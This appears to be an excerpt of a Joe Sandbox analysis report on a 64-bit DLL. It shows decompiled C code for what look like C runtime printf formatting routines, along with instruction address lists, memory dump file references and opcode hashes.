                                                                      				return E000000011800028F0(r13b,  *_t305, _v56 ^ _t313 - 0x00000050);
                                                                      			}






























                                                                      0x18002b49c
                                                                      0x18002b49c
                                                                      0x18002b49c
                                                                      0x18002b49c
                                                                      0x18002b49c
                                                                      0x18002b4a1
                                                                      0x18002b4a6
                                                                      0x18002b4b4
                                                                      0x18002b4bb
                                                                      0x18002b4c5
                                                                      0x18002b4c9
                                                                      0x18002b4cc
                                                                      0x18002b4cf
                                                                      0x18002b4d5
                                                                      0x18002b4d8
                                                                      0x18002b4db
                                                                      0x18002b4de
                                                                      0x18002b4e0
                                                                      0x18002b4e2
                                                                      0x18002b4eb
                                                                      0x18002b4f3
                                                                      0x18002b4f7
                                                                      0x18002b4ff
                                                                      0x18002b507
                                                                      0x18002b50c
                                                                      0x18002b510
                                                                      0x18002b514
                                                                      0x18002b51c
                                                                      0x18002b524
                                                                      0x18002b529
                                                                      0x18002b52e
                                                                      0x18002b533
                                                                      0x18002b538
                                                                      0x18002b53d
                                                                      0x18002b541
                                                                      0x18002b545
                                                                      0x18002b549
                                                                      0x18002b54d
                                                                      0x18002b551
                                                                      0x18002b555
                                                                      0x18002b559
                                                                      0x18002b55e
                                                                      0x18002b562
                                                                      0x18002b564
                                                                      0x18002b569
                                                                      0x18002b56b
                                                                      0x18002b572
                                                                      0x18002b579
                                                                      0x18002b57b
                                                                      0x18002b586
                                                                      0x18002b588
                                                                      0x18002b58c
                                                                      0x18002b594
                                                                      0x18002b599
                                                                      0x18002b59b
                                                                      0x18002b5a0
                                                                      0x18002b5a2
                                                                      0x18002b5a8
                                                                      0x18002b5ad
                                                                      0x18002b5b6
                                                                      0x18002b5ba
                                                                      0x18002b5c3
                                                                      0x18002b5c9
                                                                      0x18002b5ce
                                                                      0x18002b5d4
                                                                      0x18002b5df
                                                                      0x18002b5e9
                                                                      0x18002b5eb
                                                                      0x18002b5ef
                                                                      0x18002b5f4
                                                                      0x18002b5f6
                                                                      0x18002b5fa
                                                                      0x18002b603
                                                                      0x18002b605
                                                                      0x18002b609
                                                                      0x18002b60c
                                                                      0x18002b616
                                                                      0x18002b620
                                                                      0x18002b622
                                                                      0x18002b625
                                                                      0x18002b627
                                                                      0x18002b637
                                                                      0x18002b63b
                                                                      0x18002b63d
                                                                      0x18002b645
                                                                      0x18002b64a
                                                                      0x18002b64c
                                                                      0x18002b64f
                                                                      0x18002b658
                                                                      0x18002b65c
                                                                      0x18002b660
                                                                      0x18002b666
                                                                      0x18002b671
                                                                      0x18002b683
                                                                      0x18002b691
                                                                      0x18002b6aa
                                                                      0x18002b6b2
                                                                      0x18002b6b8
                                                                      0x18002b6c0
                                                                      0x18002b6c2
                                                                      0x18002b6c4
                                                                      0x18002b6cc
                                                                      0x18002b6cc
                                                                      0x18002b6d6
                                                                      0x18002b6d6
                                                                      0x18002b6e3
                                                                      0x18002b6ed
                                                                      0x18002b6ef
                                                                      0x18002b6f1
                                                                      0x18002b6f3
                                                                      0x18002b6fb
                                                                      0x18002b6ff
                                                                      0x18002b702
                                                                      0x18002b705
                                                                      0x18002b70a
                                                                      0x18002b715
                                                                      0x18002b71d
                                                                      0x18002b728
                                                                      0x18002b736
                                                                      0x18002b740
                                                                      0x18002b755
                                                                      0x18002b75c
                                                                      0x18002b761
                                                                      0x18002b769
                                                                      0x18002b76b
                                                                      0x18002b76d
                                                                      0x18002b774
                                                                      0x18002b77e
                                                                      0x18002b78e
                                                                      0x18002b792
                                                                      0x18002b797
                                                                      0x18002b79b
                                                                      0x18002b7a4
                                                                      0x18002b7aa
                                                                      0x18002b7b6
                                                                      0x18002b7b8
                                                                      0x18002b7bf
                                                                      0x18002b7d1
                                                                      0x18002b7db
                                                                      0x18002b7dd
                                                                      0x18002b7e0
                                                                      0x18002b7e2
                                                                      0x18002b7ea
                                                                      0x18002b7f1
                                                                      0x18002b7fc
                                                                      0x18002b7fe
                                                                      0x18002b800
                                                                      0x18002b803
                                                                      0x18002b80c
                                                                      0x18002b81d
                                                                      0x18002b827
                                                                      0x18002b829
                                                                      0x18002b82c
                                                                      0x18002b82e
                                                                      0x18002b839
                                                                      0x18002b83c
                                                                      0x18002b844
                                                                      0x18002b84f
                                                                      0x18002b85a
                                                                      0x18002b868
                                                                      0x18002b872
                                                                      0x18002b887
                                                                      0x18002b88e
                                                                      0x18002b893
                                                                      0x18002b89b
                                                                      0x18002b89d
                                                                      0x18002b89f
                                                                      0x18002b8ce

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5772cb1eaabcb1b2eb69e0b139bb9ecf688dc5f98debfc94303e1def97b5d5b
                                                                      • Instruction ID: 323bd2d0899ee4e1a1aad9eb2e17c4095a5cca43701195f58b88efcbef9d639e
                                                                      • Opcode Fuzzy Hash: b5772cb1eaabcb1b2eb69e0b139bb9ecf688dc5f98debfc94303e1def97b5d5b
                                                                      • Instruction Fuzzy Hash: 2EE1A076604A5C85EBAB8F2981443ED67A1E74CBD8F19C205EE499B3D5CF35CA4AC301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E0000000118002BD1C(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t120;
                                                                      				void* _t123;
                                                                      				unsigned int _t164;
                                                                      				signed char _t165;
                                                                      				unsigned int _t172;
                                                                      				intOrPtr _t191;
                                                                      				void* _t192;
                                                                      				void* _t200;
                                                                      				signed long long _t267;
                                                                      				void* _t283;
                                                                      				intOrPtr* _t287;
                                                                      				intOrPtr* _t290;
                                                                      				void* _t293;
                                                                      				signed int* _t305;
                                                                      				void* _t308;
                                                                      				void* _t312;
                                                                      				void* _t313;
                                                                      				void* _t316;
                                                                      				void* _t329;
                                                                      				intOrPtr* _t331;
                                                                      
                                                                      				_t316 = __r8;
                                                                      				_t307 = __rsi;
                                                                      				_t293 = __rdx;
                                                                      				_t192 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t312 = _t313;
                                                                      				_t267 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t267 ^ _t313 - 0x00000050;
                                                                      				_t120 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t283 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				r14b = 0x58;
                                                                      				r15b = 0x41;
                                                                      				_t200 = _t120 - 0x64;
                                                                      				if (_t200 > 0) goto 0x8002bdbf;
                                                                      				if (_t200 == 0) goto 0x8002be22;
                                                                      				if (_t120 == r15b) goto 0x8002be2f;
                                                                      				if (_t120 == 0x43) goto 0x8002bda2;
                                                                      				if (_t120 - 0x44 <= 0) goto 0x8002be38;
                                                                      				if (_t120 - 0x47 <= 0) goto 0x8002be2f;
                                                                      				if (_t120 == 0x53) goto 0x8002bde4;
                                                                      				if (_t120 == r14b) goto 0x8002bdb5;
                                                                      				if (_t120 == 0x5a) goto 0x8002bdae;
                                                                      				if (_t120 == 0x61) goto 0x8002be2f;
                                                                      				if (_t120 != 0x63) goto 0x8002be38;
                                                                      				E000000011800311FC(_t120, _t120 - 0x63, __rcx);
                                                                      				goto 0x8002be34;
                                                                      				E0000000118002EDCC(__rcx);
                                                                      				goto 0x8002be34;
                                                                      				_t123 = E0000000118001E734(r13b, __rcx, __rcx, _t293, __rsi, _t312, _t316, __r10);
                                                                      				goto 0x8002be34;
                                                                      				if (_t123 - 0x67 <= 0) goto 0x8002be2f;
                                                                      				if (_t123 == 0x69) goto 0x8002be22;
                                                                      				if (_t123 == 0x6e) goto 0x8002be1b;
                                                                      				if (_t123 == 0x6f) goto 0x8002bdfb;
                                                                      				if (_t123 == 0x70) goto 0x8002bdeb;
                                                                      				if (_t123 == 0x73) goto 0x8002bde4;
                                                                      				if (_t123 == 0x75) goto 0x8002be26;
                                                                      				if (_t123 != dil) goto 0x8002be38;
                                                                      				goto 0x8002bdb8;
                                                                      				E000000011800327D4(__rcx);
                                                                      				goto 0x8002be34;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8002bdb5;
                                                                      				_t164 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t164 >> 0x00000005) == 0) goto 0x8002be0f;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t164;
                                                                      				E0000000118001B724(0, __rcx, __rcx, _t293, _t307, _t312, _t316, __r10);
                                                                      				goto 0x8002be34;
                                                                      				E00000001180031C7C(__rcx, __rcx);
                                                                      				goto 0x8002be34;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001CF2C(0, __rcx, __rcx, _t293, _t307, _t312, _t316, __r10);
                                                                      				goto 0x8002be34;
                                                                      				if (E0000000118002F7C4(0, _t192, __rcx, __rcx, _t307, _t312) != 0) goto 0x8002be3f;
                                                                      				goto 0x8002c125;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002c122;
                                                                      				_t165 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002be8c;
                                                                      				if ((r13b & 0) == 0) goto 0x8002be71;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8002be89;
                                                                      				if ((r13b & _t165) == 0) goto 0x8002be7c;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8002be89;
                                                                      				if ((r13b & 0) == 0) goto 0x8002be8c;
                                                                      				_v72 = 0x20;
                                                                      				_t308 = _t329;
                                                                      				_t191 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((_t191 - r14b & 0x000000df) != 0) goto 0x8002bea7;
                                                                      				if ((r13b & _t165 >> 0x00000005) == 0) goto 0x8002bea7;
                                                                      				r8b = r13b;
                                                                      				goto 0x8002beaa;
                                                                      				r8b = 0;
                                                                      				if (r8b != 0) goto 0x8002bebd;
                                                                      				if ((_t191 - r15b & 0xffffff00 | (_t191 - r15b & 0x000000df) == 0x00000000) == 0) goto 0x8002bed8;
                                                                      				 *((char*)(_t312 + _t308 - 0x20)) = 0x30;
                                                                      				if (_t191 == r14b) goto 0x8002becc;
                                                                      				if (_t191 != r15b) goto 0x8002becf;
                                                                      				dil = r14b;
                                                                      				 *((intOrPtr*)(_t312 + _t308 - 0x1f)) = dil;
                                                                      				r15d =  *((intOrPtr*)(__rcx + 0x2c));
                                                                      				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				r15d = r15d;
                                                                      				if ((_t165 & 0x0000000c) != 0) goto 0x8002bf48;
                                                                      				if (r15d <= 0) goto 0x8002bf48;
                                                                      				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002bf13;
                                                                      				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x8002bf2c;
                                                                      				if (E00000001180041944(0x20,  *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)),  *((intOrPtr*)(__rcx + 0x460))) == 0xffffffff) goto 0x8002bf44;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8002bf48;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002bef3;
                                                                      				goto 0x8002bf48;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
                                                                      				_t60 = _t283 + 0x460; // 0x4a1
                                                                      				_t331 = _t60;
                                                                      				_t61 = _t283 + 0x20; // 0x61
                                                                      				_t305 = _t61;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002bf73;
                                                                      				if ( *((long long*)( *_t331 + 8)) != 0) goto 0x8002bf73;
                                                                      				 *_t305 =  *_t305;
                                                                      				goto 0x8002bf8a;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t67 =  &_v72; // -31
                                                                      				r8d = 0;
                                                                      				_t287 = _t331;
                                                                      				E000000011800361F0(__rcx, _t287, _t67, _t308 + 2, _t312, _t305);
                                                                      				_t172 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t172 >> 0x00000003) == 0) goto 0x8002bff0;
                                                                      				if ((r13b & _t172 >> 0x00000002) != 0) goto 0x8002bff0;
                                                                      				if (r15d <= 0) goto 0x8002bff0;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002bfc2;
                                                                      				if ( *((long long*)( *_t331 + 8)) == 0) goto 0x8002bfd7;
                                                                      				if (E00000001180041944(0x30,  *((long long*)( *_t331 + 8)),  *_t331) == 0xffffffff) goto 0x8002bfed;
                                                                      				 *_t305 = _t287 + 1;
                                                                      				if ( *_t305 == 0xfffffffe) goto 0x8002bff0;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002bfaa;
                                                                      				goto 0x8002bff0;
                                                                      				 *_t305 =  *_t305 | 0xffffffff;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002c085;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002c085;
                                                                      				_t83 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t84 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E00000001180040970( *((intOrPtr*)(__rcx + 8)), __rcx, _t84, _t83, _t312,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x8002c080;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8002c080;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002c062;
                                                                      				if ( *((long long*)( *_t331 + 8)) != 0) goto 0x8002c062;
                                                                      				 *_t305 =  *_t305 + r8d;
                                                                      				goto 0x8002c076;
                                                                      				_v88 =  *((intOrPtr*)(_t283 + 8));
                                                                      				_t96 =  &_v68; // -27
                                                                      				E000000011800361F0(_t283, _t331, _t96, _t308 + 2, _t312, _t305);
                                                                      				if (0 + r13d !=  *(_t283 + 0x48)) goto 0x8002c00a;
                                                                      				goto 0x8002c0c1;
                                                                      				 *_t305 =  *_t305 | 0xffffffff;
                                                                      				goto 0x8002c0c1;
                                                                      				r8d =  *(_t283 + 0x48);
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002c0ae;
                                                                      				if ( *((long long*)( *_t331 + 8)) != 0) goto 0x8002c0ae;
                                                                      				 *_t305 =  *_t305 + r8d;
                                                                      				goto 0x8002c0c1;
                                                                      				_v88 =  *((intOrPtr*)(_t283 + 8));
                                                                      				_t290 = _t331;
                                                                      				E000000011800361F0(_t283, _t290,  *((intOrPtr*)(_t283 + 0x40)), _t308 + 2, _t312, _t305);
                                                                      				if ( *_t305 < 0) goto 0x8002c122;
                                                                      				if ((r13b &  *(_t283 + 0x28) >> 0x00000002) == 0) goto 0x8002c122;
                                                                      				if (r15d <= 0) goto 0x8002c122;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002c0f4;
                                                                      				if ( *((long long*)( *_t331 + 8)) == 0) goto 0x8002c109;
                                                                      				if (E00000001180041944(0x20,  *((long long*)( *_t331 + 8)),  *_t331) == 0xffffffff) goto 0x8002c11f;
                                                                      				 *_t305 = _t290 + 1;
                                                                      				if ( *_t305 == 0xfffffffe) goto 0x8002c122;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002c0dc;
                                                                      				goto 0x8002c122;
                                                                      				 *_t305 =  *_t305 | 0xffffffff;
                                                                      				return E000000011800028F0(r13b,  *_t305, _v56 ^ _t313 - 0x00000050);
                                                                      			}






























                                                                      0x18002bd1c
                                                                      0x18002bd1c
                                                                      0x18002bd1c
                                                                      0x18002bd1c
                                                                      0x18002bd1c
                                                                      0x18002bd21
                                                                      0x18002bd26
                                                                      0x18002bd34
                                                                      0x18002bd3b
                                                                      0x18002bd45
                                                                      0x18002bd49
                                                                      0x18002bd4c
                                                                      0x18002bd4f
                                                                      0x18002bd55
                                                                      0x18002bd58
                                                                      0x18002bd5b
                                                                      0x18002bd5e
                                                                      0x18002bd60
                                                                      0x18002bd62
                                                                      0x18002bd6b
                                                                      0x18002bd73
                                                                      0x18002bd77
                                                                      0x18002bd7f
                                                                      0x18002bd87
                                                                      0x18002bd8c
                                                                      0x18002bd90
                                                                      0x18002bd94
                                                                      0x18002bd9c
                                                                      0x18002bda4
                                                                      0x18002bda9
                                                                      0x18002bdae
                                                                      0x18002bdb3
                                                                      0x18002bdb8
                                                                      0x18002bdbd
                                                                      0x18002bdc1
                                                                      0x18002bdc5
                                                                      0x18002bdc9
                                                                      0x18002bdcd
                                                                      0x18002bdd1
                                                                      0x18002bdd5
                                                                      0x18002bdd9
                                                                      0x18002bdde
                                                                      0x18002bde2
                                                                      0x18002bde4
                                                                      0x18002bde9
                                                                      0x18002bdeb
                                                                      0x18002bdf2
                                                                      0x18002bdf9
                                                                      0x18002bdfb
                                                                      0x18002be06
                                                                      0x18002be08
                                                                      0x18002be0c
                                                                      0x18002be14
                                                                      0x18002be19
                                                                      0x18002be1b
                                                                      0x18002be20
                                                                      0x18002be22
                                                                      0x18002be28
                                                                      0x18002be2d
                                                                      0x18002be36
                                                                      0x18002be3a
                                                                      0x18002be43
                                                                      0x18002be49
                                                                      0x18002be4e
                                                                      0x18002be54
                                                                      0x18002be5f
                                                                      0x18002be69
                                                                      0x18002be6b
                                                                      0x18002be6f
                                                                      0x18002be74
                                                                      0x18002be76
                                                                      0x18002be7a
                                                                      0x18002be83
                                                                      0x18002be85
                                                                      0x18002be89
                                                                      0x18002be8c
                                                                      0x18002be96
                                                                      0x18002bea0
                                                                      0x18002bea2
                                                                      0x18002bea5
                                                                      0x18002bea7
                                                                      0x18002beb7
                                                                      0x18002bebb
                                                                      0x18002bebd
                                                                      0x18002bec5
                                                                      0x18002beca
                                                                      0x18002becc
                                                                      0x18002becf
                                                                      0x18002bed8
                                                                      0x18002bedc
                                                                      0x18002bee0
                                                                      0x18002bee6
                                                                      0x18002bef1
                                                                      0x18002bf03
                                                                      0x18002bf11
                                                                      0x18002bf2a
                                                                      0x18002bf32
                                                                      0x18002bf38
                                                                      0x18002bf40
                                                                      0x18002bf42
                                                                      0x18002bf44
                                                                      0x18002bf4c
                                                                      0x18002bf4c
                                                                      0x18002bf56
                                                                      0x18002bf56
                                                                      0x18002bf63
                                                                      0x18002bf6d
                                                                      0x18002bf6f
                                                                      0x18002bf71
                                                                      0x18002bf73
                                                                      0x18002bf7b
                                                                      0x18002bf7f
                                                                      0x18002bf82
                                                                      0x18002bf85
                                                                      0x18002bf8a
                                                                      0x18002bf95
                                                                      0x18002bf9d
                                                                      0x18002bfa8
                                                                      0x18002bfb6
                                                                      0x18002bfc0
                                                                      0x18002bfd5
                                                                      0x18002bfdc
                                                                      0x18002bfe1
                                                                      0x18002bfe9
                                                                      0x18002bfeb
                                                                      0x18002bfed
                                                                      0x18002bff4
                                                                      0x18002bffe
                                                                      0x18002c00e
                                                                      0x18002c012
                                                                      0x18002c017
                                                                      0x18002c01b
                                                                      0x18002c024
                                                                      0x18002c02a
                                                                      0x18002c036
                                                                      0x18002c038
                                                                      0x18002c03f
                                                                      0x18002c051
                                                                      0x18002c05b
                                                                      0x18002c05d
                                                                      0x18002c060
                                                                      0x18002c062
                                                                      0x18002c06a
                                                                      0x18002c071
                                                                      0x18002c07c
                                                                      0x18002c07e
                                                                      0x18002c080
                                                                      0x18002c083
                                                                      0x18002c08c
                                                                      0x18002c09d
                                                                      0x18002c0a7
                                                                      0x18002c0a9
                                                                      0x18002c0ac
                                                                      0x18002c0ae
                                                                      0x18002c0b9
                                                                      0x18002c0bc
                                                                      0x18002c0c4
                                                                      0x18002c0cf
                                                                      0x18002c0da
                                                                      0x18002c0e8
                                                                      0x18002c0f2
                                                                      0x18002c107
                                                                      0x18002c10e
                                                                      0x18002c113
                                                                      0x18002c11b
                                                                      0x18002c11d
                                                                      0x18002c11f
                                                                      0x18002c14e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60245cd499a620046eb9032c3a6f8770d020d61374c1c1aacd572fb37c5dc0d1
                                                                      • Instruction ID: 6de231096338a2d2b2fb5a0ed74a29983cdebcd5fc31228cac417b3f78178b0a
                                                                      • Opcode Fuzzy Hash: 60245cd499a620046eb9032c3a6f8770d020d61374c1c1aacd572fb37c5dc0d1
                                                                      • Instruction Fuzzy Hash: D6E1AE3620064C86EBEB8E2985847EE27A1E74DBD8F19C215EF45877D5CF31CA4AC742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0000000118002DFAC(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				short _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t126;
                                                                      				void* _t129;
                                                                      				void* _t161;
                                                                      				void* _t168;
                                                                      				unsigned int _t169;
                                                                      				signed char _t170;
                                                                      				signed int _t181;
                                                                      				signed short _t193;
                                                                      				void* _t196;
                                                                      				void* _t200;
                                                                      				signed long long _t263;
                                                                      				void* _t281;
                                                                      				void* _t283;
                                                                      				void* _t284;
                                                                      				intOrPtr* _t286;
                                                                      				intOrPtr _t290;
                                                                      				intOrPtr* _t292;
                                                                      				signed long long _t298;
                                                                      				intOrPtr _t301;
                                                                      				intOrPtr _t303;
                                                                      				void* _t305;
                                                                      				signed int* _t306;
                                                                      				long long _t309;
                                                                      				void* _t311;
                                                                      				signed long long _t312;
                                                                      				void* _t314;
                                                                      				intOrPtr _t315;
                                                                      				signed long long _t323;
                                                                      				void* _t324;
                                                                      				intOrPtr* _t326;
                                                                      
                                                                      				_t314 = __r8;
                                                                      				_t309 = __rbp;
                                                                      				_t307 = __rsi;
                                                                      				_t283 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t312 = _t311 - 0x50;
                                                                      				_t263 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t263 ^ _t312;
                                                                      				_t126 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t281 = __rcx;
                                                                      				_t6 = _t305 - 0x20; // 0x58
                                                                      				_t193 = _t6;
                                                                      				_t7 = _t305 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t200 = _t126 - 0x64;
                                                                      				if (_t200 > 0) goto 0x8002e062;
                                                                      				if (_t200 == 0) goto 0x8002e0d3;
                                                                      				if (_t126 == 0x41) goto 0x8002e0e0;
                                                                      				if (_t126 == 0x43) goto 0x8002e03f;
                                                                      				if (_t126 - 0x44 <= 0) goto 0x8002e0eb;
                                                                      				if (_t126 - 0x47 <= 0) goto 0x8002e0e0;
                                                                      				if (_t126 == 0x53) goto 0x8002e095;
                                                                      				if (_t126 == _t193) goto 0x8002e055;
                                                                      				if (_t126 == 0x5a) goto 0x8002e04b;
                                                                      				if (_t126 == 0x61) goto 0x8002e0e0;
                                                                      				if (_t126 != 0x63) goto 0x8002e0eb;
                                                                      				E00000001180031898(_t126 - 0x63, __rcx, __rcx, __rsi, __rbp);
                                                                      				goto 0x8002e0e5;
                                                                      				E0000000118002F1E8(_t168, _t126 - 0x63, __rcx, __rcx, _t307);
                                                                      				goto 0x8002e0e5;
                                                                      				_t129 = E0000000118001F70C(r12b, _t193, _t281, _t283, _t305, _t307, _t314, __r10);
                                                                      				goto 0x8002e0e5;
                                                                      				if (_t129 - 0x67 <= 0) goto 0x8002e0e0;
                                                                      				if (_t129 == 0x69) goto 0x8002e0d3;
                                                                      				if (_t129 == 0x6e) goto 0x8002e0cc;
                                                                      				if (_t129 == 0x6f) goto 0x8002e0ac;
                                                                      				if (_t129 == 0x70) goto 0x8002e09c;
                                                                      				if (_t129 == 0x73) goto 0x8002e095;
                                                                      				if (_t129 == 0x75) goto 0x8002e0d7;
                                                                      				if (_t129 != 0x78) goto 0x8002e0eb;
                                                                      				goto 0x8002e058;
                                                                      				E00000001180032CD0(_t129 - 0x78, _t281, _t283, _t307, _t309);
                                                                      				goto 0x8002e0e5;
                                                                      				 *((intOrPtr*)(_t283 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t283 + 0x34)) = 0xb;
                                                                      				goto 0x8002e055;
                                                                      				_t169 =  *(_t283 + 0x28);
                                                                      				if ((r12b & _t169 >> 0x00000005) == 0) goto 0x8002e0c0;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t281 + 0x28) = _t169;
                                                                      				_t284 = _t281;
                                                                      				E0000000118001C6FC(0, _t193, _t281, _t284, _t305, _t307, _t314, __r10);
                                                                      				goto 0x8002e0e5;
                                                                      				E0000000118003227C(r12b & _t169 >> 0x00000005, _t284, _t307, _t309, __r10);
                                                                      				goto 0x8002e0e5;
                                                                      				 *(_t284 + 0x28) =  *(_t284 + 0x28) | 0x00000010;
                                                                      				E0000000118001DF04(0, _t193, _t281, _t284, _t305, _t307, _t314, __r10);
                                                                      				goto 0x8002e0e5;
                                                                      				if (E00000001180030AD8(0, 0x78, _t281, _t284, _t309) != 0) goto 0x8002e0f2;
                                                                      				goto 0x8002e3f3;
                                                                      				if ( *((intOrPtr*)(_t281 + 0x474)) != 2) goto 0x8002e108;
                                                                      				if ( *((intOrPtr*)(_t281 + 0x470)) == r12d) goto 0x8002e3f0;
                                                                      				if ( *((intOrPtr*)(_t281 + 0x38)) != bpl) goto 0x8002e3f0;
                                                                      				_t170 =  *(_t281 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r13d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e166;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e148;
                                                                      				_t26 = _t324 + 0xd; // 0xd
                                                                      				_v68 = _t26;
                                                                      				goto 0x8002e163;
                                                                      				if ((r12b & _t170) == 0) goto 0x8002e154;
                                                                      				goto 0x8002e141;
                                                                      				if ((r12b & 0) == 0) goto 0x8002e166;
                                                                      				_v68 = r13w;
                                                                      				_t298 = _t323;
                                                                      				r8d =  *(_t281 + 0x3a) & 0x0000ffff;
                                                                      				r10d = 0xffdf;
                                                                      				if ((r10w & (r8w & 0xffffffff) - _t193) != 0) goto 0x8002e18b;
                                                                      				r9b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8002e18e;
                                                                      				r9b = bpl;
                                                                      				r15d = 0x30;
                                                                      				if (r9b != 0) goto 0x8002e1a8;
                                                                      				if (0 == 0) goto 0x8002e1c7;
                                                                      				 *((intOrPtr*)(_t312 + 0x34 + _t298 * 2)) = r15w;
                                                                      				if (r8w == _t193) goto 0x8002e1bb;
                                                                      				if (r8w != 0x41) goto 0x8002e1be;
                                                                      				 *((short*)(_t312 + 0x36 + _t298 * 2)) = _t193 & 0x0000ffff;
                                                                      				_t196 =  *((intOrPtr*)(_t281 + 0x2c)) -  *(_t281 + 0x48);
                                                                      				if ((_t170 & 0x0000000c) != 0) goto 0x8002e234;
                                                                      				r9d = 0;
                                                                      				if (_t196 <= 0) goto 0x8002e234;
                                                                      				_t315 =  *((intOrPtr*)(_t281 + 0x460));
